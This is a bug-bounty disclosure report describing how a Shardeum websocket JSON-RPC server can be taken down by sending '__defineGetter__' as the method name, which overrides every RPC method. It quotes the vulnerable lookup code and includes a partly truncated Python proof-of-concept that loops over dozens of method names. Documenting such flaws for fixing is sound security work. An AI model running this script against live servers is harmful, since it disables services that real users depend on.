Boost _ Shardeum_ Ancillaries 33571 - [Websites and Applications - Medium] Taking down the websocket server via malicious methods object override

Submitted on Tue Jul 23 2024 16:25:12 GMT-0400 (Atlantic Standard Time) by @anton_quantish for Boost | Shardeum: Ancillaries

Report ID: #33571

Report type: Websites and Applications

Report severity: Medium



  • Taking down the application/website


Hey team,


It's possible to completely take down the websocket JSON-RPC server by a few specifically crafted requests. It will then be able to still accept new connections but won't answer to any request at all.

Vulnerability Details

When the request is received by the Websocket JSON-RPC server, first its method field checked to be present in the methods object which contains the mapping from the method names to their functions to be called:

    const method_name = request.method as string
    if (!methods[method_name as keyof typeof methods]) {
          jsonrpc: '2.0',
          error: {
            message: 'Method does not exist',
            code: -1,

Then, after some extra checks, the function from the methods mapping is called actually with the request.params and some callback passed into :

methods[method_name as keyof typeof methods](request.params, callback)

The vulnerability is that such a code allows to call not only the methods own functions, but the ones from its prototype also.

I didn't manage to achieve something like RCE this way but I was able to override all the functions in this methods mapping to become uncallable using the __defineGetter__ prototype function.

I can send the following JSON request to the JSON-RPC server:


In this case, the __defineGetter__ method will be first checked to be present in the methods mapping, and the check will pass successfully. Then, this method will be called the following way:

methods["__defineGetter__"]("eth_blockNumber", callback)

This call defines a getter function (the callback) which will be called for every further accessing the eth_blockNumber field of methods mapping.

Thus, when someone then tries to call the eth_blockNumber method, the callback function will be called as the getter function, it will return null and the method will not do anything (will fail with null is not a function exception actually).

The same could be done for all the methods available and all of them will not be callable for anyone anymore.

Impact Details

Complete take down of the websocket JSON-RPC server.

Proof of concept

Proof of Concept

  1. Install the python dependencies with pip3 install websockets

  2. Run the following exploit with python3 (replace the endpoint with your own one):

import json
import asyncio
import websockets

ENDPOINT = 'ws://'

methods = ['web3_clientVersion', 'web3_sha3', 'net_version', 'net_listening', 'net_peerCount', 'eth_protocolVersion', 'eth_syncing', 'eth_coinbase', 'eth_mining', 'eth_hashrate', 'eth_gasPrice', 'eth_accounts', 'eth_blockNumber', 'eth_getBalance', 'eth_getStorageAt', 'eth_getTransactionCount', 'eth_getBlockTransactionCountByHash', 'eth_getBlockTransactionCountByNumber', 'eth_getUncleCountByBlockHash', 'eth_getUncleCountByBlockNumber', 'eth_getCode', 'eth_signTransaction', 'eth_sendTransaction', 'eth_sendRawTransaction', 'eth_sendInternalTransaction', 'eth_call', 'eth_estimateGas', 'eth_getBlockByHash', 'eth_getBlockByNumber', 'eth_getBlockReceipts', 'eth_feeHistory', 'eth_getTransactionByHash', 'eth_getTransactionByBlockHashAndIndex', 'eth_getTransactionByBlockNumberAndIndex', 'eth_getTransactionReceipt', 'eth_getUncleByBlockHashAndIndex', 'eth_getUncleByBlockNumberAndIndex', 'eth_getCompilers', 'eth_compileSolidity', 'eth_compileLLL', 'eth_compileSerpent', 'eth_newBlockFilter', 'eth_newPendingTransactionFilter', 'eth_uninstallFilter', 'eth_newFilter', 'eth_getFilterChanges', 'eth_getFilterLogs', 'eth_getLogs', 'eth_getWork', 'eth_submitWork', 'eth_submitHashrate', 'eth_chainId', 'eth_getAccessList', 'eth_subscribe', 'eth_unsubscribe']

async def main():
	async with websockets.connect(ENDPOINT) as ws:
		for method in methods:
			await ws.send(json.dumps({
				"jsonrpc": "2.0",
				"method": "__defineGetter__",
				"params": [method],
				"id": 1

if __name__ == '__main__':
  1. Connect to websocket server with wscat -c ws:// for instance and try to execute any method. Make sure there's no response and there is an error in server log:

uncaughtException:TypeError: api_1.methods[method_name] is not a function

Last updated

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